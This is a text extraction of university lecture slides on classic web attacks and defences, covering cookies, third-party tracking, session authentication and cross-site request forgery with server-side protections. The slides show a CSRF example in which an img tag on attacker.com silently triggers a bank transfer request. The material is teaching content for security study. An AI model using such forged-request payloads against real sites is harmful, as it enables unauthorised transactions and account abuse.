![Page 126: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/126.jpg)
Statefulness with Cookies
• Server stores state, indexes it with a cookie
• Send this cookie to the client
• Client stores the cookie and returns it with subsequent queries to that same server
Browser Web server
Client Server
HTTP Request
State
![Page 127: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/127.jpg)
Statefulness with Cookies
• Server stores state, indexes it with a cookie
• Send this cookie to the client
• Client stores the cookie and returns it with subsequent queries to that same server
Browser Web server
Client Server
HTTP Request
State
Cookie
![Page 128: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/128.jpg)
Statefulness with Cookies
• Server stores state, indexes it with a cookie
• Send this cookie to the client
• Client stores the cookie and returns it with subsequent queries to that same server
Browser Web server
Client Server
State
Cookie
![Page 129: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/129.jpg)
Statefulness with Cookies
• Server stores state, indexes it with a cookie
• Send this cookie to the client
• Client stores the cookie and returns it with subsequent queries to that same server
Browser Web server
Client Server
HTTP Response
State
Cookie
![Page 130: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/130.jpg)
Statefulness with Cookies
• Server stores state, indexes it with a cookie
• Send this cookie to the client
• Client stores the cookie and returns it with subsequent queries to that same server
Browser Web server
Client Server
HTTP Response
Cookie State
Cookie
![Page 131: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/131.jpg)
Statefulness with Cookies
• Server stores state, indexes it with a cookie
• Send this cookie to the client
• Client stores the cookie and returns it with subsequent queries to that same server
Browser Web server
Client Server
HTTP Response
Cookie State
Cookie
Cookie
![Page 132: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/132.jpg)
Statefulness with Cookies
• Server stores state, indexes it with a cookie
• Send this cookie to the client
• Client stores the cookie and returns it with subsequent queries to that same server
Browser Web server
Client Server
HTTP Response
Cookie State
Cookie
Cookie
Server
![Page 133: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/133.jpg)
Statefulness with Cookies
• Server stores state, indexes it with a cookie
• Send this cookie to the client
• Client stores the cookie and returns it with subsequent queries to that same server
Browser Web server
Client Server
State
Cookie
Cookie
Server
![Page 134: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/134.jpg)
Statefulness with Cookies
• Server stores state, indexes it with a cookie
• Send this cookie to the client
• Client stores the cookie and returns it with subsequent queries to that same server
Browser Web server
Client Server
HTTP Request
State
Cookie
Cookie
Server
![Page 135: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/135.jpg)
Statefulness with Cookies
• Server stores state, indexes it with a cookie
• Send this cookie to the client
• Client stores the cookie and returns it with subsequent queries to that same server
Browser Web server
Client Server
HTTP Request
State
Cookie
Cookie
Server
Cookie
![Page 136: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/136.jpg)
<html> …… </html>
Hea
ders
Dat
a
Set-Cookie:key=value; options; ….Cookies are key-value pairs
![Page 137: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/137.jpg)
<html> …… </html>
Hea
ders
Dat
a
Set-Cookie:key=value; options; ….Cookies are key-value pairs
![Page 138: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/138.jpg)
Cookies
Browser
Client
(Private) Data
Semantics
![Page 139: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/139.jpg)
Cookies
Browser
Client
(Private) Data
• Store “us” under the key “edition” (think of it like one big hash table)
Semantics
![Page 140: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/140.jpg)
Cookies
Browser
Client
(Private) Data
• Store “us” under the key “edition” (think of it like one big hash table)
• This value is no good as of Wed Feb 18…
Semantics
![Page 141: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/141.jpg)
Cookies
Browser
Client
(Private) Data
• Store “us” under the key “edition” (think of it like one big hash table)
• This value is no good as of Wed Feb 18…
• This value should only be readable by any domain ending in .zdnet.com
Semantics
![Page 142: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/142.jpg)
Cookies
Browser
Client
(Private) Data
• Store “us” under the key “edition” (think of it like one big hash table)
• This value is no good as of Wed Feb 18…
• This value should only be readable by any domain ending in .zdnet.com
• This should be available to any resource within a subdirectory of /
Semantics
![Page 143: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/143.jpg)
Cookies
Browser
Client
(Private) Data
• Store “us” under the key “edition” (think of it like one big hash table)
• This value is no good as of Wed Feb 18…
• This value should only be readable by any domain ending in .zdnet.com
• This should be available to any resource within a subdirectory of /
• Send the cookie to any future requests to <domain>/<path>
Semantics
![Page 144: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/144.jpg)
Cookies
Browser
Client
(Private) Data
• Store “us” under the key “edition” (think of it like one big hash table)
• This value is no good as of Wed Feb 18…
• This value should only be readable by any domain ending in .zdnet.com
• This should be available to any resource within a subdirectory of /
• Send the cookie to any future requests to <domain>/<path>
Semantics
![Page 145: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/145.jpg)
Requests with cookies
Subsequent visit
…
![Page 146: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/146.jpg)
Requests with cookies
Subsequent visit
…
Res
pons
e
![Page 147: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/147.jpg)
Requests with cookies
Subsequent visit
…
Res
pons
e
![Page 148: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/148.jpg)
Why use cookies?• Personalization
• Let an anonymous user customize your site • Store font choice, etc., in the cookie
![Page 149: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/149.jpg)
Why use cookies?• Tracking users
• Advertisers want to know your behavior • Ideally build a profile across different websites
- Read about iPad on CNN, then see ads on Amazon?! • How can an advertiser (A) know what you did on another site (S)?
![Page 150: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/150.jpg)
Why use cookies?• Tracking users
• Advertisers want to know your behavior • Ideally build a profile across different websites
- Read about iPad on CNN, then see ads on Amazon?! • How can an advertiser (A) know what you did on another site (S)?
S shows you an ad from A; A scrapes the referrer URL
![Page 151: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/151.jpg)
Why use cookies?• Tracking users
• Advertisers want to know your behavior • Ideally build a profile across different websites
- Read about iPad on CNN, then see ads on Amazon?! • How can an advertiser (A) know what you did on another site (S)?
S shows you an ad from A; A scrapes the referrer URL
Option 1: A maintains a DB, indexed by your IP address Problem: IP addrs change
![Page 152: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/152.jpg)
Why use cookies?• Tracking users
• Advertisers want to know your behavior • Ideally build a profile across different websites
- Read about iPad on CNN, then see ads on Amazon?! • How can an advertiser (A) know what you did on another site (S)?
S shows you an ad from A; A scrapes the referrer URL
Option 1: A maintains a DB, indexed by your IP address Problem: IP addrs change
Option 2: A maintains a DB indexed by a cookie
- “Third-party cookie”- Commonly used by large
ad networks (doubleclick)
![Page 153: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/153.jpg)
![Page 154: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/154.jpg)
Ad provided byan ad network
![Page 163: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/163.jpg)
I visit reddit.com
Later, I go to reddit.com/r/security
We are only sharing this cookie with *.adzerk.net; but we are telling them
about where we just came from
![Page 164: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/164.jpg)
Cookies and web authentication• An extremely common use of cookies is to
track users who have already authenticated
• If the user already visitedhttp://website.com/login.html?user=alice&pass=secretwith the correct password, then the server associates a “session cookie” with the logged-in user’s info
• Subsequent requests (GET and POST) include the cookie in the request headers and/or as one of the fields:http://website.com/doStuff.html?sid=81asf98as8eak
• The idea is for the server to be able to say “I am talking to the same browser that authenticated Alice earlier.”
![Page 165: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/165.jpg)
Cookies and web authentication• An extremely common use of cookies is to
track users who have already authenticated
• If the user already visitedhttp://website.com/login.html?user=alice&pass=secretwith the correct password, then the server associates a “session cookie” with the logged-in user’s info
• Subsequent requests (GET and POST) include the cookie in the request headers and/or as one of the fields:http://website.com/doStuff.html?sid=81asf98as8eak
• The idea is for the server to be able to say “I am talking to the same browser that authenticated Alice earlier.”
Attacks?
![Page 166: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/166.jpg)
Cross-Site Request Forgery (CSRF)
![Page 167: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/167.jpg)
URLs with side-effects
• GET requests should have no side-effects, but often do
• What happens if the user is logged in with an active session cookie and visits this link?
• How could you possibly get a user to visit this link?
http://bank.com/transfer.cgi?amt=9999&to=attacker
![Page 168: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/168.jpg)
Exploiting URLs with side-effects
Browser
Client attacker.com
![Page 169: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/169.jpg)
Exploiting URLs with side-effects
Browser
Client
<img src=“
http://ban
k.com/
transfer.c
gi?amt=999
9&to=attac
ker”>
attacker.com
![Page 170: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/170.jpg)
Exploiting URLs with side-effects
Browser
Client
<img src=“
http://ban
k.com/
transfer.c
gi?amt=999
9&to=attac
ker”>
attacker.com
Browser automaticallyvisits the URL to obtainwhat it believes will be an image.
![Page 171: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/171.jpg)
Exploiting URLs with side-effects
Browser
Client
bank.com
<img src=“
http://ban
k.com/
transfer.c
gi?amt=999
9&to=attac
ker”>
attacker.com
Browser automaticallyvisits the URL to obtainwhat it believes will be an image.
![Page 172: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/172.jpg)
Exploiting URLs with side-effects
Browser
Client
bank.com
<img src=“
http://ban
k.com/
transfer.c
gi?amt=999
9&to=attac
ker”>
http://bank.com/
transfer.cgi?amt=9999&to=attacker
attacker.com
Browser automaticallyvisits the URL to obtainwhat it believes will be an image.
![Page 173: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/173.jpg)
Exploiting URLs with side-effects
Browser
Client
bank.com
<img src=“
http://ban
k.com/
transfer.c
gi?amt=999
9&to=attac
ker”>
http://bank.com/
transfer.cgi?amt=9999&to=attacker
attacker.com
Browser automaticallyvisits the URL to obtainwhat it believes will be an image.
Cookie
bank.com
![Page 174: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/174.jpg)
Exploiting URLs with side-effects
Browser
Client
bank.com
<img src=“
http://ban
k.com/
transfer.c
gi?amt=999
9&to=attac
ker”>
http://bank.com/
transfer.cgi?amt=9999&to=attacker
attacker.com
Browser automaticallyvisits the URL to obtainwhat it believes will be an image.
Cookie
bank.com
Cookie
![Page 175: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/175.jpg)
Exploiting URLs with side-effects
Browser
Client
bank.com
<img src=“
http://ban
k.com/
transfer.c
gi?amt=999
9&to=attac
ker”>
http://bank.com/
transfer.cgi?amt=9999&to=attacker
attacker.com
Browser automaticallyvisits the URL to obtainwhat it believes will be an image.
Cookie
bank.com
Cookie
$$$
![Page 176: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/176.jpg)
Login CSRF
![Page 177: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/177.jpg)
Login CSRF
![Page 178: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/178.jpg)
Cross-Site Request Forgery• Target: User who has some sort of account on a vulnerable
server where requests from the user’s browser to the server have a predictable structure
• Attack goal: make requests to the server via the user’s browser that look to the server like the user intended to make them
• Attacker tools: ability to get the user to visit a web page under the attacker’s control
• Key tricks: • Requests to the web server have predictable structure • Use of something like <img src=…> to force the victim to send it
![Page 179: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/179.jpg)
CSRF protections• Client-side:
![Page 180: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/180.jpg)
CSRF protections• Client-side:
Disallow one site to link to another??
The loss of functionality would be too high
![Page 181: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/181.jpg)
CSRF protections• Client-side:
Disallow one site to link to another??
The loss of functionality would be too high
Let’s consider server-side protections
![Page 182: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/182.jpg)
Secret validation tokens• Include a secret validation token in the request
• Must be difficult for an attacker to predict
• Options: • Random session ID
- Stored as cookie (“session independent nonce”) - Stored at server (“session-dependent nonce”)
• The session cookie itself (“session identifier”)http://website.com/doStuff.html?sid=81asf98as8eak
• HMAC of the cookie - As unique as session cookie, but learning the HMAC doesn’t
reveal the cookie itself
![Page 183: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/183.jpg)
Referrer URLs
![Page 184: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/184.jpg)
Referrer URLsIdea: Only allow certain actions if the referrer URL is from this site, as well
![Page 185: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/185.jpg)
Referrer URLsIdea: Only allow certain actions if the referrer URL is from this site, as well
Problem: Often suppressed
![Page 186: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/186.jpg)
Custom headers
![Page 187: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/187.jpg)
Custom headersSecurity through obscurity
![Page 188: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/188.jpg)
Custom headersSecurity through obscurity
Include precisely what is needed to identify the principal who referred
![Page 189: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/189.jpg)
Custom headersSecurity through obscurity
Include precisely what is needed to identify the principal who referred
Origin headers: More private Referrer headers
![Page 190: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/190.jpg)
Custom headersSecurity through obscurity
Include precisely what is needed to identify the principal who referred
Origin headers: More private Referrer headers
http://foo.com/embarrassing.html?data=oops
![Page 191: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/191.jpg)
Custom headersSecurity through obscurity
Include precisely what is needed to identify the principal who referred
Origin headers: More private Referrer headers
http://foo.com/embarrassing.html?data=oops
![Page 192: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/192.jpg)
Custom headersSecurity through obscurity
Include precisely what is needed to identify the principal who referred
Origin headers: More private Referrer headers
http://foo.com/embarrassing.html?data=oops
Send only for POST requests
![Page 193: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/193.jpg)
How can you steal a session cookie?
Browser Web server
Client Server
Cookie State
Cookie
Cookie
Server
Cookie
![Page 194: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/194.jpg)
How can you steal a session cookie?
• Compromise the user’s machine / browser
• Sniff the network
• DNS cache poisoning • Trick the user into thinking you are Facebook • The user will send you the cookie
Browser Web server
Client Server
Cookie State
Cookie
Cookie
Server
Cookie
![Page 195: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/195.jpg)
How can you steal a session cookie?
• Compromise the user’s machine / browser
• Sniff the network
• DNS cache poisoning • Trick the user into thinking you are Facebook • The user will send you the cookie
Network-based attacks (more later)
Browser Web server
Client Server
Cookie State
Cookie
Cookie
Server
Cookie
![Page 196: CLASSIC WEB ATKS & DEFS - cs.umd.eduCLASSIC WEB ATKS & DEFS GRAD SEC SEP 19 2017. TODAY’S PAPERS. A very basic web architecture ... • a language for creating & querying data -and](https://reader033.fdocuments.us/reader033/viewer/2022060400/5f0e076c7e708231d43d4426/html5/thumbnails/196.jpg)
Stealing users’ cookies
